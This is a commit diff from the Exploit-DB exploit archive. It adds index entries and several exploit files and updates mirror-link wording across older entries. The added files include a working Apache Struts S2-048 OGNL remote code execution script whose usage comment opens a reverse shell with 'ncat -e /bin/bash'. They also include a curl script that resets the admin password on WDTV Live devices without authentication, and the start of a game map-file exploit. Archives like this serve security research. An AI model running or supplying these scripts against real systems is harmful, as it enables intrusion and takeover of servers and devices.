DB: 2017-07-15
4 new exploits Counter Strike: Condition Zero - '.BSP' Map File Code Execution Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution Apache Struts 2.3.x Showcase - Remote Code Execution (PoC) WDTV Live SMP 2.03.20 - Remote Password Reset
This commit is contained in:
parent
2f83b6c1be
commit
635e0e935f
51 changed files with 784 additions and 54 deletions
|
@ -9132,6 +9132,7 @@ id,file,description,date,author,platform,type,port
|
|||
42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
|
||||
42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
|
||||
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
|
||||
42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15693,6 +15694,7 @@ id,file,description,date,author,platform,type,port
|
|||
42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
|
||||
42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
|
||||
42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
|
||||
42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -38134,3 +38136,5 @@ id,file,description,date,author,platform,type,port
|
|||
42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0
|
||||
42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0
|
||||
42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0
|
||||
42324,platforms/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps,0
|
||||
42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -1,6 +1,6 @@
|
|||
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
|
||||
|
||||
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
|
||||
http://zenthought.org/content/file/android-root-2009-08-16-source
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-08-18]
|
||||
|
|
|
@ -3,6 +3,9 @@ This exploit was leaked on the Full Disclosure mailing list:
|
|||
http://seclists.org/fulldisclosure/2012/Jun/404
|
||||
|
||||
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip
|
||||
|
||||
|
||||
BSD telnetd Remote Root Exploit *ZERODAY*
|
||||
By Kingcope
|
||||
Year 2011
|
||||
|
@ -48,6 +51,3 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
|
|||
02:41:51 UTC 2011
|
||||
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
|
||||
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip
|
||||
|
||||
|
|
|
@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
|
|||
Root-Node
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse
|
63
platforms/hardware/webapps/42326.txt
Executable file
63
platforms/hardware/webapps/42326.txt
Executable file
|
@ -0,0 +1,63 @@
|
|||
#######################################################
|
||||
## WDTV Live SMP Remote Password Reset Vulnerability ##
|
||||
#######################################################
|
||||
|
||||
Date: Jul 14 2017
|
||||
Author: sw1tch
|
||||
Demo: https://www.sw1tch.net/2017/07/12/wdtv-live-smb-exploit/
|
||||
Description: A simple remotely exploitable web application vulnerability
|
||||
for the WDTV Live Streaming Media Player and possibly other WDTV systems.
|
||||
|
||||
-INTRO-
|
||||
|
||||
The WDTV Live SMP is a is a consumer device produced by Western Digital
|
||||
that plays videos, images, and music from USB drives. It can play
|
||||
high-definition video through an HDMI port, and standard video through
|
||||
composite video cables. It can play most common video and audio formats. As
|
||||
of August 2016, the WDTV appears to be discontinued.
|
||||
|
||||
The latest firmware version appears to be 2.03.20.
|
||||
|
||||
-VULNERABILITY-
|
||||
|
||||
The WDTV Live SMP runs an embedded webserver, allowing authenticated users
|
||||
to upload themes, manage device settings, access a virtual remote and other
|
||||
tasks. To authenticate, a user needs to provide the correct password (no
|
||||
username).
|
||||
|
||||
An unauthenticated attacker can update the password via a constructed GET
|
||||
request, subsequently taking control of many functions of the device.
|
||||
|
||||
Vulnerable versions include at least firmware 2.03.20, and likely many more
|
||||
older versions.
|
||||
|
||||
-POC-
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
echo
|
||||
echo "WDTV Live SMP Admin Password Reset Exploit"
|
||||
echo "Apparently sw1tch found this guff in 2017"
|
||||
echo
|
||||
if [ $# != 2 ]; then
|
||||
echo "Usage: `basename $0` <target IP/host> <new password>"
|
||||
echo
|
||||
exit $ERR_ARG
|
||||
fi
|
||||
|
||||
# Vars...
|
||||
target=$1
|
||||
password=$2
|
||||
|
||||
echo -n "[*] Slamming your chosen password at $target now..."
|
||||
curl "http://$target/DB/modfiy_pw.php" -d "password=$password"
|
||||
echo "done!"
|
||||
echo "[*] Try logging in to http://$target/ using $password"
|
||||
echo
|
||||
exit 0
|
||||
|
||||
-FIX-
|
||||
|
||||
None available. Device appears to be EOL so unlikely to be remediated.
|
||||
|
||||
--------------------------------------------------------------------------------------------------------------------------------
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
EDB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
|
||||
*/
|
||||
|
||||
--------------------------------------------------- decr.c ---------------------------------------------------
|
||||
|
|
|
@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR
|
|||
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz
|
|
@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
|
|||
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
|
|
@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils
|
|||
|
||||
$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
|
||||
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
|
||||
|
||||
...
|
||||
$ strings strings-bfd-badptr2
|
||||
|
|
|
@ -9,6 +9,6 @@
|
|||
# CVE : N/A
|
||||
|
||||
Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz
|
||||
|
||||
Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html
|
|
@ -125,5 +125,5 @@ Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=
|
|||
|
||||
|
||||
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
|
||||
E-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
|
||||
|
||||
|
|
|
@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
|
|||
*/
|
||||
|
||||
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
|
||||
|
||||
# milw0rm.com [2009-08-14]
|
||||
|
|
|
@ -4,6 +4,6 @@
|
|||
Quick and dirty exploit for this one:
|
||||
|
||||
http://www.frasunek.com/proto_ops.tgz
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
|
||||
|
||||
# milw0rm.com [2009-08-14]
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
# CVE : No CVE, no patch just 0Day
|
||||
# State : Critical
|
||||
|
||||
# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
|
||||
|
||||
---------------Description-----------------
|
||||
|
||||
|
|
|
@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
|
|||
Avaya Intuity AUDIX LX 1.0
|
||||
Avaya Intuity AUDIX
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
|
||||
Author: RoMaNSoFt <roman@rs-labs.com>
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
|
||||
|
||||
# milw0rm.com [2007-11-02]
|
||||
|
|
|
@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
|
|||
VMWare ESX Server 3.5 ESX350-200910401
|
||||
VMWare ACE 2.5.3 Build 185404
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
|
|
@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
|
|||
Ghostscript Ghostscript 8.54
|
||||
Ghostscript Ghostscript 8.15
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
|
51
platforms/multiple/webapps/42324.py
Executable file
51
platforms/multiple/webapps/42324.py
Executable file
|
@ -0,0 +1,51 @@
|
|||
#!/usr/bin/python
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
# Just a demo for CVE-2017-9791
|
||||
|
||||
|
||||
import requests
|
||||
|
||||
|
||||
def exploit(url, cmd):
|
||||
print("[+] command: %s" % cmd)
|
||||
|
||||
payload = "%{"
|
||||
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
|
||||
payload += "(#_memberAccess?(#_memberAccess=#dm):"
|
||||
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
|
||||
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
|
||||
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
|
||||
payload += "(#ognlUtil.getExcludedClasses().clear())."
|
||||
payload += "(#context.setMemberAccess(#dm))))."
|
||||
payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
|
||||
payload += "}"
|
||||
|
||||
data = {
|
||||
"name": payload,
|
||||
"age": 20,
|
||||
"__checkbox_bustedBefore": "true",
|
||||
"description": 1
|
||||
}
|
||||
|
||||
headers = {
|
||||
'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
|
||||
}
|
||||
requests.post(url, data=data, headers=headers)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print("python %s <url> <cmd>" % sys.argv[0])
|
||||
sys.exit(0)
|
||||
|
||||
print('[*] exploit Apache Struts2 S2-048')
|
||||
url = sys.argv[1]
|
||||
cmd = sys.argv[2]
|
||||
|
||||
exploit(url, cmd)
|
||||
|
||||
# $ ncat -v -l -p 4444 &
|
||||
# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
|
|
@ -72,4 +72,4 @@ mysql root, facebook/twitter accounts and so on.
|
|||
---
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32618.tgz
|
|
@ -27,5 +27,5 @@ Test Environment:
|
|||
|
||||
====================================================================
|
||||
Download the following file for more instructions and exploits:
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
|
||||
====================================================================
|
|
@ -22,5 +22,5 @@ Cheers!
|
|||
# - A valid account as at least a user
|
||||
# - The target to have outgoing internet connectivity
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24480.tar.gz
|
||||
|
||||
|
|
|
@ -2,5 +2,5 @@ Source: http://packetstormsecurity.org/files/115908/sysret.rar
|
|||
|
||||
This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process.
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar
|
||||
|
||||
|
|
|
@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails
|
|||
|
||||
An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar)
|
||||
|
|
|
@ -19,7 +19,7 @@ DoS("DoS");
|
|||
|
||||
-------------------------
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12080.pdf
|
||||
|
||||
Regards
|
||||
|
||||
|
|
|
@ -57,4 +57,4 @@ User mode write access violations that are not near NULL are exploitable.
|
|||
Proof of concept included.
|
||||
|
||||
http://www21.zippyshare.com/v/83302158/file.html
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar
|
||||
|
|
|
@ -37,4 +37,4 @@ ntdll!RtlEnterCriticalSection+0x8:
|
|||
Proof of concept included.
|
||||
|
||||
http://www42.zippyshare.com/v/23669551/file.html
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf
|
||||
|
|
|
@ -75,4 +75,4 @@ User mode write access violations that are not near NULL are exploitable.
|
|||
################################################################################
|
||||
Proof of concept included.
|
||||
http://www21.zippyshare.com/v/83302158/file.html
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip
|
||||
|
|
|
@ -65,6 +65,6 @@ User mode DEP access violations are exploitable.
|
|||
################################################################################
|
||||
Proof of concept included.
|
||||
|
||||
Exploit-DB mirror: http://www39.zippyshare.com/v/91522221/file.html
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar
|
||||
http://www39.zippyshare.com/v/91522221/file.html
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar
|
||||
|
||||
|
|
|
@ -76,4 +76,4 @@ libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c)
|
|||
176efdb4 000003e8
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31899.avs
|
|
@ -1,4 +1,4 @@
|
|||
## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33056-sepm-secars-poc-v0.3.tar.gz
|
||||
|
||||
#!/usr/bin/perl -w
|
||||
# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
|
||||
|
|
|
@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit
|
|||
3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process.
|
||||
4 . the otherside's yahoo! messenger will be crashed.
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
|
||||
|
||||
# milw0rm.com [2007-08-29]
|
||||
|
|
|
@ -16,5 +16,5 @@
|
|||
# also check here for The Persian docs of this methods and more :
|
||||
http://www.0days.ir/article/
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)
|
||||
|
||||
|
|
|
@ -149,4 +149,4 @@ stores in stack :D
|
|||
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)
|
||||
|
|
|
@ -3,7 +3,7 @@ Somehow, our script got on to the Russian forums :/
|
|||
|
||||
@w3bd3vil and @abh1sek
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29881.tar.gz
|
||||
|
||||
Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
|
||||
=================================================================
|
||||
|
|
|
@ -32,4 +32,4 @@ Trendmicro, CDC
|
|||
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30007.zip
|
|
@ -30,4 +30,4 @@ The expolit is in the file attatchment named shellcode.txt
|
|||
2. Select all the content in the editor
|
||||
3. Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31895.7z
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
## Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
|
||||
## EDB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
|
||||
# Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35661-poc.zip
|
||||
|
||||
|
||||
Platform: Windows 8.1 Update 32/64 bit (No other OS tested)
|
||||
|
|
|
@ -25,5 +25,5 @@ FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
|
|||
context-dependent attacker to corrupt memory and potentially execute
|
||||
arbitrary code.
|
||||
|
||||
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
|
||||
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-poc.flv
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35901-windbglog.txt
|
|
@ -25,5 +25,5 @@ M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a
|
|||
context-dependent attacker to corrupt memory and potentially execute
|
||||
arbitrary code.
|
||||
|
||||
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
|
||||
## EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-poc.m2v
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35902-windbglog.txt
|
|
@ -12,10 +12,10 @@ R136a1 / hfiref0x
|
|||
## Compiled EXE:
|
||||
### x86
|
||||
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe
|
||||
+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
|
||||
+ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
|
||||
### x64
|
||||
+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
|
||||
+ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
|
||||
+ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
|
||||
|
||||
Source Code:
|
||||
https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip
|
||||
|
|
|
@ -14,4 +14,4 @@ http://theori.io/research/cve-2016-0189
|
|||
3. Browse with a victim IE to `vbscript_bypass_pm.html`.
|
||||
4. (Re-fresh or re-open in case it doesn't work; It's not 100% reliable.)
|
||||
|
||||
EDB-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40118.zip
|
237
platforms/windows/local/42325.py
Executable file
237
platforms/windows/local/42325.py
Executable file
|
@ -0,0 +1,237 @@
|
|||
#!/usr/bin/env python
|
||||
# Counter Strike: Condition Zero BSP map exploit
|
||||
# By @Digital_Cold Jun 11, 2017
|
||||
#
|
||||
# E-DB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42325.zip (bsp-exploit-source.zip)
|
||||
#
|
||||
from binascii import hexlify, unhexlify
|
||||
from struct import pack, unpack
|
||||
import math
|
||||
import mmap
|
||||
import logging
|
||||
|
||||
fmt = "[+] %(message)s"
|
||||
|
||||
logging.basicConfig(level=logging.INFO, format=fmt)
|
||||
l = logging.getLogger("exploit")
|
||||
|
||||
# Specific to the file
|
||||
INDEX_BUFFER_OFF = 0x92ee0 # ARRAY[int]
|
||||
VERTEX_BUFFER_INDEXES_OFF = 0xA9174 # ARRAY[unsigned short]
|
||||
VERTEX_DATA_OFF = 0x37f7c # ARRAY[VEC3], VEC3[float, float, float]
|
||||
NUM_EDGES_OFF = 0x70f94 # The length that was fuzzed to cause the crash
|
||||
|
||||
# No longer used as could not find a gadget to 'pop, pop, pop esp, ret'
|
||||
# SEH_OVERWRITE_OFF = 0x4126C
|
||||
|
||||
# Initial offset into the index buffer where the function to exploit resides
|
||||
INITIAL_OFFSET = 0xb130 # this is multiplied by 4 for data type size already
|
||||
|
||||
# INDEX_BUFFER
|
||||
# 0: 20
|
||||
# 1: 10
|
||||
# 2: 2 --> Vertex Buffer Indexes
|
||||
|
||||
# VERTEX BUFFER INDEXES
|
||||
# 0: 1
|
||||
# 1: 2
|
||||
# 2: 4 --> Vertex Data
|
||||
|
||||
# VERTEX DATA
|
||||
# 0: 1.23, 23423.0, 3453.3
|
||||
# 1: 1.23, -9.0, 3453.3
|
||||
# 2: 1.0, 1.0, 1.0
|
||||
# 3: 1.0, 1.0, 1.0
|
||||
# 4: 0.0, 1.0, 0.0
|
||||
|
||||
# Example:
|
||||
# a = INDEX_BUFFER[2] ; a = 2
|
||||
# b = VERTEX_BUFFER[a] ; b = 4
|
||||
